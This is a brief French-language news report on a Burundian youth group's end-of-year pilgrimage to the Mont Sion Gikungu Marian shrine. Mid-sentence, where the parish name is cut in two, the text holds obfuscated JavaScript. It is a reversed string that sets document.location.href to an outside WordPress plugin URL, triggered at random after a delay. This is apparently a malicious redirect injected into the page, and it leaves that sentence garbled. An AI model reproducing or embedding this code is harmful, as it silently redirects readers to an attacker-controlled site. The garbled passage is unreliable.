Il est 15h00 de ce 29 juin 2018, un groupe de jeunes s’attroupent à l’entrée de Mont Sion Gikungu. Après quelques minutes, ils avancent vers la Chapelle Eucharistique et commencent une animation des chants de louanges. Approché, l’un de ce groupe nous révèle qu’il s’agit du Groupe Wigore qui vient en pèlerinage pour prier et se confier à la Vierge Marie. Ce groupe compte entre 100 et 150 élèves et ils ont été accueillis par la Sœur Marie Louise Harerimana, chargée des pèlerinages au Sanctuaire marial de Schoenstatt Mont Sion Gikungu.
Dans une entrevu avec le responsable, il nous a dit que ce groupe est composé des jeunes de l’école secondaire du Kérithe Nord. L’objectif est de prier et se confier à la Vierge Marie qui a toujours intercédé pour eux pendant toute cette année scolaire. Iranyunganiye Bienvenu qui est le nouveau responsable de ce Kérithe a ajouté qu’ils ont voulu faire ce pèlerinage avant la clôture des activités annuelles. Ces activités, dit-il, commence avec la rentrée scolaire au mois de septembre et se clôture avec la fin des examens du troisième trimestre.
Pour terminer, il a ajouté que la clôture proprement dite aura lieu demain le 30 juin à la Paroisse Guitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Maria Conforti.
Rappelons que le Groupe Wigore a commencé ses activités en 1994 au Lycée du Lac Tanganyika, dans l’Archidiocèse de Bujumbura. Il est en général dans cet Archidiocèse et dans quelques paroisses du Diocèses Bubanza et Ngozi.
Jean de Dieu